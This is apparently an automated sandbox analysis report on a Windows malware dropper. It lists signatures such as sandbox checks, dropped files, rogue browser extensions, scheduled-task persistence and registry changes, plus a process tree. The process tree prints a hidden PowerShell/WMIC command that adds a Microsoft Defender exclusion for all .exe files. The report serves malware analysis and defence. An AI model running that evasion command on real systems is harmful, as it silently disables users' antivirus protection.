Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07-04-2024 23:43
Static task
static1
Behavioral task
behavioral1
Sample
99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
Resource
win7-20240221-en
General
-
Target
99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe
-
Size
6.6MB
-
MD5
d3acc3ecd7d0ebba98f5cb5d40eca69e
-
SHA1
b47c16250eb0a92c3a2830b4fae6f2b31d22b44c
-
SHA256
99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1
-
SHA512
12714b3c5c9a572c7a713aa0271e79b7801764d0a96e96f22b489815b45318855671379dd4f202b115bf3c81f97358d067fd5e0a7b67cef4484eb6a7d56cf59a
-
SSDEEP
196608:91O+PM1g/Yk3wokBf8uLAlC3qsW4Ul2VmHZ4Dc7t:3O+PCg/IokBUuk2UlW/Dc5
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 66 4916 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exeSYnDWRn.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation SYnDWRn.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exeAsrnguO.exeSYnDWRn.exepid process 1648 Install.exe 4644 AsrnguO.exe 3912 SYnDWRn.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4916 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
SYnDWRn.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json SYnDWRn.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json SYnDWRn.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
SYnDWRn.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini SYnDWRn.exe -
Drops file in System32 directory 29 IoCs
Processes:
SYnDWRn.exeAsrnguO.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA SYnDWRn.exe File created C:\Windows\system32\GroupPolicy\gpt.ini AsrnguO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SYnDWRn.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 SYnDWRn.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol AsrnguO.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 SYnDWRn.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA SYnDWRn.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 SYnDWRn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 SYnDWRn.exe -
Drops file in Program Files directory 14 IoCs
Processes:
SYnDWRn.exedescription ioc process File created C:\Program Files (x86)\bHChqWbaifmeC\yfYcztl.xml SYnDWRn.exe File created C:\Program Files (x86)\tYlulnlhfvUn\erYfueB.dll SYnDWRn.exe File created C:\Program Files (x86)\atUnoJEcU\wUHcGx.dll SYnDWRn.exe File created C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\vFIWIzm.xml SYnDWRn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi SYnDWRn.exe File created C:\Program Files (x86)\AhrcuswkDyIWnALCLrR\pNvkEBQ.dll SYnDWRn.exe File created C:\Program Files (x86)\OiJitsNRDAtU2\YqdZEqY.xml SYnDWRn.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SYnDWRn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja SYnDWRn.exe File created C:\Program Files (x86)\atUnoJEcU\WXvLvkq.xml SYnDWRn.exe File created C:\Program Files (x86)\OiJitsNRDAtU2\QwBUIHTcIGbxW.dll SYnDWRn.exe File created C:\Program Files (x86)\bHChqWbaifmeC\HKEOgRB.dll SYnDWRn.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi SYnDWRn.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak SYnDWRn.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\azeUktJAaUwkEYH.job schtasks.exe File created C:\Windows\Tasks\CtcwvJUdbvqSdFcLs.job schtasks.exe File created C:\Windows\Tasks\bjzvzwrptCEFdBfgJx.job schtasks.exe File created C:\Windows\Tasks\eKTzntQiDjkvtKkfQ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3124 schtasks.exe 1532 schtasks.exe 4136 schtasks.exe 4664 schtasks.exe 2264 schtasks.exe 1892 schtasks.exe 1220 schtasks.exe 2320 schtasks.exe 4436 schtasks.exe 4112 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exeSYnDWRn.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume SYnDWRn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" SYnDWRn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" SYnDWRn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{f429969b-0000-0000-0000-d01200000000}\MaxCapacity = "14116" SYnDWRn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" SYnDWRn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXESYnDWRn.exepowershell.exepid process 3168 powershell.exe 3168 powershell.exe 1112 powershell.exe 1112 powershell.exe 4708 powershell.exe 4708 powershell.exe 4432 powershell.EXE 4432 powershell.EXE 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 4016 powershell.exe 4016 powershell.exe 4016 powershell.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe 3912 SYnDWRn.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeWMIC.exepowershell.exepowershell.exepowershell.EXEpowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 3168 powershell.exe Token: SeIncreaseQuotaPrivilege 1892 WMIC.exe Token: SeSecurityPrivilege 1892 WMIC.exe Token: SeTakeOwnershipPrivilege 1892 WMIC.exe Token: SeLoadDriverPrivilege 1892 WMIC.exe Token: SeSystemProfilePrivilege 1892 WMIC.exe Token: SeSystemtimePrivilege 1892 WMIC.exe Token: SeProfSingleProcessPrivilege 1892 WMIC.exe Token: SeIncBasePriorityPrivilege 1892 WMIC.exe Token: SeCreatePagefilePrivilege 1892 WMIC.exe Token: SeBackupPrivilege 1892 WMIC.exe Token: SeRestorePrivilege 1892 WMIC.exe Token: SeShutdownPrivilege 1892 WMIC.exe Token: SeDebugPrivilege 1892 WMIC.exe Token: SeSystemEnvironmentPrivilege 1892 WMIC.exe Token: SeRemoteShutdownPrivilege 1892 WMIC.exe Token: SeUndockPrivilege 1892 WMIC.exe Token: SeManageVolumePrivilege 1892 WMIC.exe Token: 33 1892 WMIC.exe Token: 34 1892 WMIC.exe Token: 35 1892 WMIC.exe Token: 36 1892 WMIC.exe Token: SeIncreaseQuotaPrivilege 1892 WMIC.exe Token: SeSecurityPrivilege 1892 WMIC.exe Token: SeTakeOwnershipPrivilege 1892 WMIC.exe Token: SeLoadDriverPrivilege 1892 WMIC.exe Token: SeSystemProfilePrivilege 1892 WMIC.exe Token: SeSystemtimePrivilege 1892 WMIC.exe Token: SeProfSingleProcessPrivilege 1892 WMIC.exe Token: SeIncBasePriorityPrivilege 1892 WMIC.exe Token: SeCreatePagefilePrivilege 1892 WMIC.exe Token: SeBackupPrivilege 1892 WMIC.exe Token: SeRestorePrivilege 1892 WMIC.exe Token: SeShutdownPrivilege 1892 WMIC.exe Token: SeDebugPrivilege 1892 WMIC.exe Token: SeSystemEnvironmentPrivilege 1892 WMIC.exe Token: SeRemoteShutdownPrivilege 1892 WMIC.exe Token: SeUndockPrivilege 1892 WMIC.exe Token: SeManageVolumePrivilege 1892 WMIC.exe Token: 33 1892 WMIC.exe Token: 34 1892 WMIC.exe Token: 35 1892 WMIC.exe Token: 36 1892 WMIC.exe Token: SeDebugPrivilege 1112 powershell.exe Token: SeDebugPrivilege 4708 powershell.exe Token: SeDebugPrivilege 4432 powershell.EXE Token: SeDebugPrivilege 4016 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4460 WMIC.exe Token: SeIncreaseQuotaPrivilege 4460 WMIC.exe Token: SeSecurityPrivilege 4460 WMIC.exe Token: SeTakeOwnershipPrivilege 4460 WMIC.exe Token: SeLoadDriverPrivilege 4460 WMIC.exe Token: SeSystemtimePrivilege 4460 WMIC.exe Token: SeBackupPrivilege 4460 WMIC.exe Token: SeRestorePrivilege 4460 WMIC.exe Token: SeShutdownPrivilege 4460 WMIC.exe Token: SeSystemEnvironmentPrivilege 4460 WMIC.exe Token: SeUndockPrivilege 4460 WMIC.exe Token: SeManageVolumePrivilege 4460 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4460 WMIC.exe Token: SeIncreaseQuotaPrivilege 4460 WMIC.exe Token: SeSecurityPrivilege 4460 WMIC.exe Token: SeTakeOwnershipPrivilege 4460 WMIC.exe Token: SeLoadDriverPrivilege 4460 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exeInstall.exeforfiles.execmd.exepowershell.exeAsrnguO.exepowershell.execmd.exedescription pid process target process PID 3952 wrote to memory of 1648 3952 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 3952 wrote to memory of 1648 3952 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 3952 wrote to memory of 1648 3952 99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe Install.exe PID 1648 wrote to memory of 1632 1648 Install.exe forfiles.exe PID 1648 wrote to memory of 1632 1648 Install.exe forfiles.exe PID 1648 wrote to memory of 1632 1648 Install.exe forfiles.exe PID 1632 wrote to memory of 4040 1632 forfiles.exe cmd.exe PID 1632 wrote to memory of 4040 1632 forfiles.exe cmd.exe PID 1632 wrote to memory of 4040 1632 forfiles.exe cmd.exe PID 4040 wrote to memory of 3168 4040 cmd.exe powershell.exe PID 4040 wrote to memory of 3168 4040 cmd.exe powershell.exe PID 4040 wrote to memory of 3168 4040 cmd.exe powershell.exe PID 3168 wrote to memory of 1892 3168 powershell.exe WMIC.exe PID 3168 wrote to memory of 1892 3168 powershell.exe WMIC.exe PID 3168 wrote to memory of 1892 3168 powershell.exe WMIC.exe PID 1648 wrote to memory of 3124 1648 Install.exe schtasks.exe PID 1648 wrote to memory of 3124 1648 Install.exe schtasks.exe PID 1648 wrote to memory of 3124 1648 Install.exe schtasks.exe PID 4644 wrote to memory of 1112 4644 AsrnguO.exe powershell.exe PID 4644 wrote to memory of 1112 4644 AsrnguO.exe powershell.exe PID 4644 wrote to memory of 1112 4644 AsrnguO.exe powershell.exe PID 1112 wrote to memory of 3856 1112 powershell.exe cmd.exe PID 1112 wrote to memory of 3856 1112 powershell.exe cmd.exe PID 1112 wrote to memory of 3856 1112 powershell.exe cmd.exe PID 3856 wrote to memory of 4112 3856 cmd.exe reg.exe PID 3856 wrote to memory of 4112 3856 cmd.exe reg.exe PID 3856 wrote to memory of 4112 3856 cmd.exe reg.exe PID 1112 wrote to memory of 2404 1112 powershell.exe reg.exe PID 1112 wrote to memory of 2404 1112 powershell.exe reg.exe PID 1112 wrote to memory of 2404 1112 powershell.exe reg.exe PID 1112 wrote to memory of 1744 1112 powershell.exe reg.exe PID 1112 wrote to memory of 1744 1112 powershell.exe reg.exe PID 1112 wrote to memory of 1744 1112 powershell.exe reg.exe PID 1112 wrote to memory of 3396 1112 powershell.exe reg.exe PID 1112 wrote to memory of 3396 1112 powershell.exe reg.exe PID 1112 wrote to memory of 3396 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4064 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4064 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4064 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4464 1112 powershell.exe gpupdate.exe PID 1112 wrote to memory of 4464 1112 powershell.exe gpupdate.exe PID 1112 wrote to memory of 4464 1112 powershell.exe gpupdate.exe PID 1112 wrote to memory of 3632 1112 powershell.exe reg.exe PID 1112 wrote to memory of 3632 1112 powershell.exe reg.exe PID 1112 wrote to memory of 3632 1112 powershell.exe reg.exe PID 1112 wrote to memory of 2096 1112 powershell.exe reg.exe PID 1112 wrote to memory of 2096 1112 powershell.exe reg.exe PID 1112 wrote to memory of 2096 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4924 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4924 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4924 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4480 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4480 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4480 1112 powershell.exe reg.exe PID 1112 wrote to memory of 720 1112 powershell.exe reg.exe PID 1112 wrote to memory of 720 1112 powershell.exe reg.exe PID 1112 wrote to memory of 720 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4396 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4396 1112 powershell.exe reg.exe PID 1112 wrote to memory of 4396 1112 powershell.exe reg.exe PID 1112 wrote to memory of 3184 1112 powershell.exe reg.exe PID 1112 wrote to memory of 3184 1112 powershell.exe reg.exe PID 1112 wrote to memory of 3184 1112 powershell.exe reg.exe PID 1112 wrote to memory of 2304 1112 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"C:\Users\Admin\AppData\Local\Temp\99ec5388d313fa009657ce8b619b203f62053c5602d639364f05f978cb980dd1.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3952 -
C:\Users\Admin\AppData\Local\Temp\7zS3A2A.tmp\Install.exe.\Install.exe /riRVBdidLX "385118" /S2⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1648 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:1632 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
-
-
-
